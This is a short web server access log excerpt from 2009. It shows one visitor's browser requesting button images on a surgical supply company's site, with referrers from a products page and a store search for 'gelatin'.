117.196.99.221 - - [04/Jun/2009:03:12:21 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
117.196.99.221 - - [04/Jun/2009:03:12:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
117.196.99.221 - - [04/Jun/2009:03:12:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
117.196.99.221 - - [04/Jun/2009:03:12:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
117.196.99.221 - - [04/Jun/2009:03:12:29 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):gelatin" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
